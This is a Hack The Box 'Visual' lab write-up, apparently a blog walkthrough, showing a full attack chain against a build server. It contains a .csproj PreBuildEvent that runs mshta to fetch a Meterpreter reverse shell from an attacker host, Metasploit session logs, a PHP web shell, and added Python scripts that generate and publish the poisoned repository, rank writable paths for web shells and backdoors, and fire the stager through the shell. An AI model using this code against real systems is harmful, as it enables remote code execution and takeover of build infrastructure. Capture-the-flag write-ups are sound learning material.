【Hack The Box】Visual【WriteUp】

Posted at 2024-02-25

Introduction

Hi, I'm a hopeless wannabe engineer.
This article is a write-up of my attempt at the Hack The Box machine "Visual".
Note: unlike my earlier posts, this one does not explain how each tool is used in detail.

Note: do not misuse any of this. Use these techniques only to contribute to society; otherwise you will be breaking the law.

Initial enumeration

Port scan

This time I ran a fast scan with RustScan.

┌──(root㉿kali)-[~]
└─# rustscan -a 10.10.11.234 --top --ulimit 5000
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.11.234:80
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

[~] Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-14 03:53 EDT
Initiating Ping Scan at 03:53
Scanning 10.10.11.234 [4 ports]
Completed Ping Scan at 03:53, 0.29s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 03:53
Completed Parallel DNS resolution of 1 host. at 03:53, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 03:53
Scanning 10.10.11.234 [1 port]
Discovered open port 80/tcp on 10.10.11.234
Completed SYN Stealth Scan at 03:53, 0.22s elapsed (1 total ports)
Nmap scan report for 10.10.11.234
Host is up, received echo-reply ttl 127 (0.22s latency).
Scanned at 2023-10-14 03:53:08 EDT for 0s

PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack ttl 127

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.61 seconds
           Raw packets sent: 5 (196B) | Rcvd: 2 (72B)

Only port 80 appears to be open.
Browsing to port 80 brings up a web site.

Site inspection

Near the bottom of the page there is a form that POSTs a URL.
I started an HTTP server with Python and submitted my own address.
The page then shows something that looks like a build in progress. The POST field is named RepoLink, so is it perhaps building a repository?
A git directory listing also shows up, so that is probably what it does.
As the page itself says, it seems to build a .NET 6 repository, so I'll create one on Windows.

.NET6

Visual Studio 2022

As stated on the page, I create it with Visual Studio 2022 as a console app, making sure to select .NET 6 as the target framework.
Project created.

git

Now publish this directory as a repository and point the site at it.

I also run git update-server-info, a step that often trips people up: it writes the info/refs and objects/info/packs files that a clone over plain (dumb) HTTP needs.

Now submit it to the form.
Huh? There is a .sln right there, though??
Ah, I completely forgot to commit.
Submit again.
This time it builds the project and produces an executable!
So the attack is presumably to embed a payload in this project.

Initial access

ChatGPT

I had no idea how to get RCE at build time, so I asked ChatGPT.

Its first suggestion looked right, but when I actually tried it, it didn't work... so I asked again for something that runs before the build.

PreBuild

When you create a .NET 6 project in Visual Studio 2022, a .csproj project file is generated. It holds all sorts of project settings; the MSBuild documentation explains them in detail.

One of those settings is PreBuildEvent.

Setting PreBuildEvent makes MSBuild run a command before the build itself starts.
That is where I put a command that establishes a reverse shell.

mshta

The command placed in the project file is based on the mshta shell from HackTricks.

I host the HTA with Metasploit and wait for the reverse shell there. The command takes the form mshta http://webserver/payload.hta.

┌──(root㉿kali)-[~/work]
└─# msfconsole
                                                  
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%     %%%         %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%  %%  %%%%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%  %  %%%%%%%%   %%%%%%%%%%% https://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%%
%%  %%  %%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%  %%%%%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%  %%%  %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%    %%   %%%%%%%%%%%  %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%  %%%  %%%%%
%%%%  %%  %%  %      %%      %%    %%%%%      %    %%%%  %%   %%%%%%       %%
%%%%  %%  %%  %  %%% %%%%  %%%%  %%  %%%%  %%%%  %% %%  %% %%% %%  %%%  %%%%%
%%%%  %%%%%%  %%   %%%%%%   %%%%  %%%  %%%%  %%    %%  %%% %%% %%   %%  %%%%%
%%%%%%%%%%%% %%%%     %%%%%    %%  %%   %    %%  %%%%  %%%%   %%%   %%%     %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%  %%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%          %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%


       =[ metasploit v6.3.31-dev                          ]
+ -- --=[ 2346 exploits - 1220 auxiliary - 413 post       ]
+ -- --=[ 1390 payloads - 46 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Display the Framework log using the 
log command, learn more with help log
Metasploit Documentation: https://docs.metasploit.com/

msf6 > search hta_server

Matching Modules
================

   #  Name                             Disclosure Date  Rank    Check  Description
   -  ----                             ---------------  ----    -----  -----------
   0  exploit/windows/misc/hta_server  2016-10-06       manual  No     HTA Web Server


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/misc/hta_server

msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/misc/hta_server) > show options

Module options (exploit/windows/misc/hta_server):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen
                                        on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.0.2.15        yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Powershell x86



View the full module info with the info, or info -d command.

Set the options.

msf6 exploit(windows/misc/hta_server) > set LHOST 10.10.14.68
LHOST => 10.10.14.68
msf6 exploit(windows/misc/hta_server) > set SRVHOST 10.10.14.68
SRVHOST => 10.10.14.68
msf6 exploit(windows/misc/hta_server) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[-] Handler failed to bind to 10.10.14.68:4444:-  -
[*] Started reverse TCP handler on 0.0.0.0:4444 
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (10.10.14.68:8080).
msf6 exploit(windows/misc/hta_server) > exploit
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.10.14.68:4444 
[*] Using URL: http://10.10.14.68:8080/2E1MdaR84iCmK.hta
[*] Server started.
msf6 exploit(windows/misc/hta_server) > 

The first exploit attempt failed to bind: the reverse handler could not bind 10.10.14.68:4444 and fell back to 0.0.0.0, and the HTA server could not bind 10.10.14.68:8080 at all ("already in use or unavailable"); the second attempt came up cleanly. Pass the URL of this server to the mshta command.

Payload

The .csproj I actually created looks like this.

<Project Sdk="Microsoft.NET.Sdk">

  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <TargetFramework>net6.0</TargetFramework>
    <ImplicitUsings>enable</ImplicitUsings>
    <Nullable>enable</Nullable>
    <PreBuildEvent>
    	mshta.exe http://10.10.14.68:8080/2E1MdaR84iCmK.hta
    </PreBuildEvent>
  </PropertyGroup>

</Project>

After several tries, what worked was writing the command directly as the text of <PreBuildEvent>, without a <Command> element. (Command is an attribute of the Exec task inside a <Target>, not a property; the PreBuildEvent property is picked up by MSBuild's built-in PreBuildEvent target, which runs it through Exec.)
Note: recreating the project over and over was painful.
I move this payload to Kali and wait for the connection there.
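The whole procedure above (project file with a PreBuildEvent, commit, update-server-info, serve over HTTP) as one script. This is an added example, not the author's code or anything taken from the Visual machine; the repo name evilapp, port 8000, the clone URL http://<attacker>:8000/evilapp/.git, the minimal .sln and its project GUID are assumptions. prebuild_command() reads the .csproj the way MSBuild does, which is a useful check before submitting the repo.

```python
"""Weaponised .NET 6 repo for a build server that honours PreBuildEvent.

Added example for this write-up, not the author's code. Assumed (not from the
page): repo name 'evilapp', http.server on port 8000, and that the builder can
clone http://<attacker>:8000/evilapp/.git over plain HTTP. publish() needs git.
"""
import pathlib
import subprocess
import sys
import xml.etree.ElementTree as ET
from typing import Optional
from xml.sax.saxutils import escape

CSPROJ = """<Project Sdk="Microsoft.NET.Sdk">

  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <TargetFramework>net6.0</TargetFramework>
    <ImplicitUsings>enable</ImplicitUsings>
    <Nullable>enable</Nullable>
    <PreBuildEvent>{command}</PreBuildEvent>
  </PropertyGroup>

</Project>
"""

# Minimal .sln (Debug only), since the builder in the write-up appears to want
# one. FAE04EC0-... is the C# project-type GUID; the other GUID is an arbitrary
# project id chosen for this example.
SLN = """
Microsoft Visual Studio Solution File, Format Version 12.00
Project("{{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}}") = "{name}", "{name}.csproj", "{{1B2C3D4E-0000-4000-8000-000000000001}}"
EndProject
Global
\tGlobalSection(SolutionConfigurationPlatforms) = preSolution
\t\tDebug|Any CPU = Debug|Any CPU
\tEndGlobalSection
\tGlobalSection(ProjectConfigurationPlatforms) = postSolution
\t\t{{1B2C3D4E-0000-4000-8000-000000000001}}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
\t\t{{1B2C3D4E-0000-4000-8000-000000000001}}.Debug|Any CPU.Build.0 = Debug|Any CPU
\tEndGlobalSection
EndGlobal
"""

def render_csproj(hta_url: str) -> str:
    """Project file whose PreBuildEvent property runs mshta against our HTA."""
    # escape() keeps '&' and '<' valid XML, e.g. for a URL with a query string
    return CSPROJ.format(command=escape(f"mshta.exe {hta_url}"))

def prebuild_command(csproj_text: str) -> Optional[str]:
    """Return the command MSBuild will run before compiling, or None.

    The PreBuildEvent *property* (a child of PropertyGroup) is consumed by the
    built-in PreBuildEvent target, which runs it through the Exec task; a
    <Command> element under PropertyGroup is merely an unused property.
    """
    root = ET.fromstring(csproj_text)
    if root.tag != "Project":
        return None
    for group in root.findall("PropertyGroup"):
        node = group.find("PreBuildEvent")
        if node is not None and node.text and node.text.strip():
            return node.text.strip()
    return None

def write_repo(repo_dir: pathlib.Path, hta_url: str) -> None:
    """Write csproj, sln and a trivial Program.cs so the project compiles."""
    name = repo_dir.name
    repo_dir.mkdir(parents=True, exist_ok=True)
    (repo_dir / f"{name}.csproj").write_text(render_csproj(hta_url))
    (repo_dir / f"{name}.sln").write_text(SLN.format(name=name))
    (repo_dir / "Program.cs").write_text('Console.WriteLine("build ok");\n')

def publish(repo_dir: pathlib.Path) -> None:
    """Commit and prepare the repo for a dumb-HTTP clone (needs git)."""
    def git(*args: str) -> None:
        subprocess.run(["git", "-C", str(repo_dir), *args], check=True)
    git("init", "-q")
    git("add", "-A")
    git("-c", "user.name=dev", "-c", "user.email=dev@example.com", "commit", "-q", "-m", "init")
    # No commit means nothing to clone (the write-up's first miss); without
    # update-server-info a dumb-HTTP clone finds no info/refs and fails.
    git("update-server-info")

if __name__ == "__main__":
    repo = pathlib.Path("srv") / "evilapp"
    write_repo(repo, sys.argv[1])  # e.g. http://10.10.14.68:8080/2E1MdaR84iCmK.hta
    publish(repo)
    print("serve: python3 -m http.server 8000 --directory srv")
    print("then submit http://<attacker>:8000/evilapp/.git to the RepoLink form")
```

Run it with the HTA URL the hta_server module printed, start the HTTP server it suggests, and submit the .git URL to the form while the HTA server is still listening. If the target turns out to clone with smart HTTP rather than dumb HTTP, update-server-info does no harm.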

msf6 exploit(windows/misc/hta_server) > 
[*] 10.10.11.234     hta_server - Delivering Payload
[*] Sending stage (175686 bytes) to 10.10.11.234
[*] Meterpreter session 1 opened (10.10.14.68:4444 -> 10.10.11.234:50537) at 2023-10-14 06:22:40 -0400

msf6 exploit(windows/misc/hta_server) > show sessions

Active sessions
===============

  Id  Name  Type                     Information           Connection
  --  ----  ----                     -----------           ----------
  1         meterpreter x86/windows  VISUAL\enox @ VISUAL  10.10.14.68:4444 -> 10.10.11.234:50537 (10.10.11.234)

msf6 exploit(windows/misc/hta_server) > 
msf6 exploit(windows/misc/hta_server) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: VISUAL\enox

Submitting the repository URL to the form as before, a request arrives at the HTA server and the session opens.
That gives us a shell, and the user flag can be read from it.

Lateral movement

winPEAS

Download winPEAS from its GitHub repository and upload it to the target machine.

meterpreter > upload winPEASany.exe
[*] Uploading  : /root/work/winPEASany.exe -> winPEASany.exe
[*] Uploaded 2.28 MiB of 2.28 MiB (100.0%): /root/work/winPEASany.exe -> winPEASany.exe
[*] Completed  : /root/work/winPEASany.exe -> winPEASany.exe
meterpreter > 

Drop into shell mode and run winPEAS.

C:\Users\enox\Desktop>.\winPEASany.exe
.\winPEASany.exe
ANSI color bit for Windows is not set. If you are executing this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
Long paths are disabled, so the maximum length of a path supported is 260 chars (this may cause false negatives when looking for files). If you are admin, you can enable it with 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
     
               ((((((((((((((((((((((((((((((((                                                                                                             
        (((((((((((((((((((((((((((((((((((((((((((                                                                                                         
      ((((((((((((((**********/##########(((((((((((((                                                                                                      
    ((((((((((((********************/#######(((((((((((                                                                                                     
    ((((((((******************/@@@@@/****######((((((((((                                                                                                   
    ((((((********************@@@@@@@@@@/***,####((((((((((                                                                                                 
    (((((********************/@@@@@%@@@@/********##(((((((((                                                                                                
    (((############*********/%@@@@@@@@@/************((((((((                                                                                                
    ((##################(/******/@@@@@/***************((((((                                                                                                
    ((#########################(/**********************(((((                                                                                                
    ((##############################(/*****************(((((                                                                                                
    ((###################################(/************(((((                                                                                                
    ((#######################################(*********(((((                                                                                                
    ((#######(,.***.,(###################(..***.*******(((((                                                                                                
    ((#######*(#####((##################((######/(*****(((((                                                                                                
    ((###################(/***********(##############()(((((                                                                                                
    (((#####################/*******(################)((((((                                                                                                
    ((((############################################)((((((                                                                                                 
    (((((##########################################)(((((((                                                                                                 
    ((((((########################################)(((((((                                                                                                  
    ((((((((####################################)((((((((                                                                                                   
    (((((((((#################################)(((((((((                                                                                                    
        ((((((((((##########################)(((((((((                                                                                                      
              ((((((((((((((((((((((((((((((((((((((                                                                                                        
                 ((((((((((((((((((((((((((((((                                                                                                             

ADVISORY: winpeas should be used for authorized penetration testing and/or educational purposes only.Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own devices and/or with the device owner's permission.                                       
                                                                                                                                                            
  WinPEAS-ng by @hacktricks_live                                                                                                                            

       /---------------------------------------------------------------------------------\                                                                  
       |                             Do you like PEASS?                                  |                                                                  
       |---------------------------------------------------------------------------------|                                                                  
       |         Get the latest version    :     https://github.com/sponsors/carlospolop |                                                                  
       |         Follow on Twitter         :     @hacktricks_live                        |                                                                  
       |         Respect on HTB            :     SirBroccoli                             |                                                                  
       |---------------------------------------------------------------------------------|                                                                  
       |                                 Thank you!                                      |                                                                  
       \---------------------------------------------------------------------------------/                                                                  
                                                                                                                                                            
  [+] Legend:
         Red                Indicates a special privilege over an object or something is misconfigured
         Green              Indicates that some protection is enabled or something is well configured
         Cyan               Indicates active users
         Blue               Indicates disabled users
         LightYellow        Indicates links

...(omitted)
         ͹ Searching executable files in non-default folders with write (equivalent) permissions (can be slow)
     File Permissions "C:\xampp\php\phpunit.bat": Everyone [AllAccess]
     File Permissions "C:\xampp\php\phpdbg.exe": Everyone [AllAccess]
     File Permissions "C:\xampp\php\php.exe": Everyone [AllAccess]
     File Permissions "C:\xampp\php\php-win.exe": Everyone [AllAccess]
     File Permissions "C:\xampp\php\php-cgi.exe": Everyone [AllAccess]
     File Permissions "C:\xampp\php\pecl.bat": Everyone [AllAccess]
     File Permissions "C:\xampp\php\peardev.bat": Everyone [AllAccess]
     File Permissions "C:\xampp\php\pear.bat": Everyone [AllAccess]
     File Permissions "C:\xampp\php\pciconf.bat": Everyone [AllAccess]
     File Permissions "C:\xampp\php\pci.bat": Everyone [AllAccess]
     File Permissions "C:\xampp\php\deplister.exe": Everyone [AllAccess]
     File Permissions "C:\xampp\php\windowsXamppPhp\deplister.exe": Everyone [AllAccess]
     File Permissions "C:\xampp\php\windowsXamppPhp\php-cgi.exe": Everyone [AllAccess]
     File Permissions "C:\xampp\php\windowsXamppPhp\php-win.exe": Everyone [AllAccess]
     File Permissions "C:\xampp\php\windowsXamppPhp\php.exe": Everyone [AllAccess]
     File Permissions "C:\xampp\php\windowsXamppPhp\phpdbg.exe": Everyone [AllAccess]
     File Permissions "C:\xampp\php\scripts\pciconf.bat": Everyone [AllAccess]
     File Permissions "C:\xampp\php\scripts\compatinfo.bat": Everyone [AllAccess]
     File Permissions "C:\xampp\php\extras\openssl\openssl.exe": Everyone [AllAccess]
...(omitted)
     File Permissions "C:\xampp\xampp-control.exe": Everyone [AllAccess]
     File Permissions "C:\xampp\xampp_start.exe": Everyone [AllAccess]
     File Permissions "C:\xampp\xampp_stop.exe": Everyone [AllAccess]
     File Permissions "C:\xampp\htdocs\uploads\9dedb189cacbbb848c2f38ce455f8c\Visual.exe": Everyone [AllAccess],enox [AllAccess]
     File Permissions "C:\xampp\htdocs\uploads\FullPowers.exe": Everyone [AllAccess]
     File Permissions "C:\xampp\htdocs\uploads\GodPotato-NET2.exe": Everyone [AllAccess]
     File Permissions "C:\xampp\htdocs\uploads\GodPotato-NET35.exe": Everyone [AllAccess]
...(omitted)

From the above, C:\xampp\htdocs is writable by Everyone. So a web shell can be uploaded there, and since it will run under the account that XAMPP's web server runs as, it may hand us that account's shell. Let's try it.
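winPEAS prints hundreds of these lines. The script below, an added example that is not part of the write-up or of winPEAS, parses the "File Permissions" lines into path and principal/access pairs and sorts the paths writable by low-privileged principals into next steps. SAMPLE is constructed from the lines above plus one made-up Administrators-only entry as a negative control; the WEB_ROOTS list and the bucket names are the example's own assumptions.

```python
"""Triage winPEAS 'File Permissions' findings into next steps.

Added example, not part of the write-up or of winPEAS. SAMPLE is constructed
from the output shown above plus one made-up Administrators-only line as a
negative control; the WEB_ROOTS list and the bucket rules are this example's
own heuristics.
"""
import re
from collections import defaultdict
from typing import Dict, List, Tuple

# winPEAS shape:  File Permissions "C:\path\x.exe": Everyone [AllAccess],enox [AllAccess]
LINE_RE = re.compile(r'File Permissions "([^"]+)":\s*(.+?)\s*$')
GRANT_RE = re.compile(r'([^,\[\]]+?)\s*\[([^\]]+)\]')

WEB_ROOTS = (r"c:\xampp\htdocs", r"c:\inetpub\wwwroot")  # assumed; extend per target
LOW_PRIV = {"everyone", "users", "authenticated users", "builtin\\users"}

SAMPLE = [
    r'     File Permissions "C:\xampp\php\php.exe": Everyone [AllAccess]',
    r'     File Permissions "C:\xampp\xampp-control.exe": Everyone [AllAccess]',
    r'     File Permissions "C:\xampp\htdocs\uploads\9dedb189cacbbb848c2f38ce455f8c\Visual.exe": Everyone [AllAccess],enox [AllAccess]',
    r'     File Permissions "C:\xampp\htdocs\uploads\GodPotato-NET2.exe": Everyone [AllAccess]',
    r'     File Permissions "C:\Program Files\Example\svc.exe": Administrators [AllAccess]',  # constructed
]


def parse(lines: List[str]) -> List[Tuple[str, Dict[str, str]]]:
    """(path, {principal: access}) for every File Permissions line; others skipped."""
    found = []
    for line in lines:
        m = LINE_RE.search(line)
        if m:
            grants = {p.strip(): a.strip() for p, a in GRANT_RE.findall(m.group(2))}
            found.append((m.group(1), grants))
    return found


def low_priv_writable(grants: Dict[str, str]) -> bool:
    """True when a low-privileged principal has write-equivalent access."""
    return any(p.lower() in LOW_PRIV and ("AllAccess" in a or "Write" in a)
               for p, a in grants.items())


def triage(lines: List[str]) -> Dict[str, List[str]]:
    """Bucket low-priv-writable paths by what they enable."""
    buckets: Dict[str, List[str]] = defaultdict(list)
    for path, grants in parse(lines):
        if not low_priv_writable(grants):
            continue
        low = path.lower()
        if low.startswith(WEB_ROOTS):
            buckets["webshell: drop a script under the web root"].append(path)
        elif low.endswith((".exe", ".bat", ".dll")):
            buckets["backdoor binary: replace it and wait for a launch"].append(path)
        else:
            buckets["other writable"].append(path)
    return dict(buckets)


if __name__ == "__main__":
    for what, paths in triage(SAMPLE).items():
        print(what)
        for p in paths:
            print("   ", p)
```

Feed it the full winPEAS output (one line per list entry) and the web-root bucket is the shortlist for the next step; the binary bucket is worth a look too, because anything under C:\xampp that Everyone can overwrite runs as whoever starts XAMPP.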

Webshell

Create a PHP web shell.

taks_shell.php
<?php system($_GET["cmd"]); /* system() already prints the output; wrapping it in echo would print the last line twice */ ?>

Upload the shell.

meterpreter > dir
Listing: C:\xampp\htdocs
========================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
040777/rwxrwxrwx  0     dir   2023-06-10 13:32:32 -0400  assets
040777/rwxrwxrwx  0     dir   2023-06-10 13:32:32 -0400  css
100666/rw-rw-rw-  7534  fil   2023-06-10 21:20:46 -0400  index.php
040777/rwxrwxrwx  0     dir   2023-06-10 13:32:32 -0400  js
100666/rw-rw-rw-  1554  fil   2023-06-10 19:17:32 -0400  submit.php
040777/rwxrwxrwx  4096  dir   2023-10-14 06:42:52 -0400  uploads
100666/rw-rw-rw-  4970  fil   2023-06-10 19:11:46 -0400  vs_status.php

meterpreter > 
meterpreter > upload taks_shell.php
[*] Uploading  : /root/work/taks_shell.php -> taks_shell.php
[*] Uploaded 37.00 B of 37.00 B (100.0%): /root/work/taks_shell.php -> taks_shell.php
[*] Completed  : /root/work/taks_shell.php -> taks_shell.php

Run a command to check that it works.
dir returned a listing, so the web shell is working.
Now fire the mshta exploit through it, just like before.

mshta

┌──(root㉿kali)-[~/work]
└─# msfconsole 
                                                  
# cowsay++
 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____                                                                                                                                         
           (__)    )\                                                                                                                                       
              ||--|| *                                                                                                                                      
                                                                                                                                                            

       =[ metasploit v6.3.31-dev                          ]
+ -- --=[ 2346 exploits - 1220 auxiliary - 413 post       ]
+ -- --=[ 1390 payloads - 46 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: View advanced module options with 
advanced
Metasploit Documentation: https://docs.metasploit.com/

msf6 > use windows/misc/hta_server
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/misc/hta_server) > show options

Module options (exploit/windows/misc/hta_server):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen
                                        on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.0.2.15        yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Powershell x86



View the full module info with the info, or info -d command.

msf6 exploit(windows/misc/hta_server) > set LHOST 10.10.14.68
LHOST => 10.10.14.68
msf6 exploit(windows/misc/hta_server) > set LPORT 4440
LPORT => 4440
msf6 exploit(windows/misc/hta_server) > set SRVHOST 10.10.14.68
SRVHOST => 10.10.14.68
msf6 exploit(windows/misc/hta_server) > set SRVPORT 8081
SRVPORT => 8081
msf6 exploit(windows/misc/hta_server) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.10.14.68:4440 
[*] Using URL: http://10.10.14.68:8081/rX7BasfkSWHWM.hta
[*] Server started.
msf6 exploit(windows/misc/hta_server) >

Server up. Now run mshta.exe http://10.10.14.68:8081/rX7BasfkSWHWM.hta through the web shell.
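Typing that into a browser works, but the spaces and the URL inside the command have to survive query-string encoding, and the request may block. The client below is an added example, not from the write-up; the shell URL http://10.10.11.234/taks_shell.php is an assumption, since the page never shows it, while the cmd parameter is the one the page's one-liner reads.

```python
"""Drive the uploaded PHP web shell and fire the mshta stager through it.

Added example, not from the write-up. Assumed (the page does not show it):
the shell URL http://10.10.11.234/taks_shell.php. The 'cmd' parameter is the
one taks_shell.php reads.
"""
import urllib.parse
import urllib.request

SHELL = "http://10.10.11.234/taks_shell.php"


def shell_url(base: str, cmd: str) -> str:
    """Encode the command so spaces, ':' and '/' in the mshta URL survive."""
    return base + "?" + urllib.parse.urlencode({"cmd": cmd})


def run(base: str, cmd: str, timeout: float = 10.0) -> str:
    """Send one command and return its output.

    PHP's system() waits for the child to exit, so if the HTA does not close
    itself mshta keeps the request open; a timeout here is therefore not proof
    that the stager failed. Check the Metasploit listener instead.
    """
    try:
        with urllib.request.urlopen(shell_url(base, cmd), timeout=timeout) as resp:
            return resp.read().decode(errors="replace")
    except OSError as exc:  # URLError and socket timeouts both derive from OSError
        return f"<no response: {exc}>"


if __name__ == "__main__":
    print(run(SHELL, "whoami"))  # confirm which account the web server runs as
    print(run(SHELL, "mshta.exe http://10.10.14.68:8081/rX7BasfkSWHWM.hta", timeout=5))
```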

msf6 exploit(windows/misc/hta_server) >
[*] 10.10.11.234     hta_server - Delivering Payload
[*] Sending stage (175686 bytes) to 10.10.11.234
[*] Meterpreter session 1 opened (10.10.14.68:4440 -> 10.10.11.234:50618) at 2023-10-14 07:10:00 -0400

msf6 exploit(windows/misc/hta_server) > show sessions

Active sessions
===============

  Id  Name  Type                     Information                          Connection
  --  ----  ----                     -----------                          ----------
  1         meterpreter x86/windows  NT AUTHORITY\LOCAL SERVICE @ VISUAL  10.10.14.68:4440 -> 10.10.11.234:50618 (10.10.11.234)

msf6 exploit(windows/misc/hta_server) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: NT AUTHORITY\LOCAL SERVICE
meterpreter > 

We now have a shell as NT AUTHORITY\LOCAL SERVICE.

Privilege escalation

local_exploit_suggester

First the safe default: run the suggester and see what it finds.

msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > exploit

[*] 10.10.11.234 - Collecting local exploits for x64/windows...
[*] 10.10.11.234 - 186 exploit checks are being tried...
[+] 10.10.11.234 - exploit/windows/local/bypassuac_dotnet_profiler: The target appears to be vulnerable.
[+] 10.10.11.234 - exploit/windows/local/bypassuac_sdclt: The target appears to be vulnerable.
[+] 10.10.11.234 - exploit/windows/local/bypassuac_sluihijack: The target appears to be vulnerable.
[+] 10.10.11.234 - exploit/windows/local/cve_2020_1048_printerdemon: The target appears to be vulnerable.
[+] 10.10.11.234 - exploit/windows/local/cve_2020_1337_printerdemon: The target appears to be vulnerable.
[+] 10.10.11.234 - exploit/windows/local/cve_2022_21882_win32k: The target appears to be vulnerable.
[+] 10.10.11.234 - exploit/windows/local/cve_2022_21999_spoolfool_privesc: The target appears to be vulnerable.
[+] 10.10.11.234 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[*] Running check method for exploit 43 / 43
[*] 10.10.11.234 - Valid modules for session 1:
============================

 #   Name                                                           Potentially Vulnerable?  Check Result
 -   ----                                                           -----------------------  ------------
 1   exploit/windows/local/bypassuac_dotnet_profiler                Yes                      The target appears to be vulnerable.
 2   exploit/windows/local/bypassuac_sdclt                          Yes                      The target appears to be vulnerable.
 3   exploit/windows/local/bypassuac_sluihijack                     Yes                      The target appears to be vulnerable.
 4   exploit/windows/local/cve_2020_1048_printerdemon               Yes                      The target appears to be vulnerable.
 5   exploit/windows/local/cve_2020_1337_printerdemon               Yes                      The target appears to be vulnerable.
 6   exploit/windows/local/cve_2022_21882_win32k                    Yes                      The target appears to be vulnerable.
 7   exploit/windows/local/cve_2022_21999_spoolfool_privesc         Yes                      The target appears to be vulnerable.
 8   exploit/windows/local/ms16_032_secondary_logon_handle_privesc  Yes                      The service is running, but could not be validated.
 9   exploit/windows/local/agnitum_outpost_acs                      No                       The target is not exploitable.
 10  exploit/windows/local/always_install_elevated                  No                       The target is not exploitable.
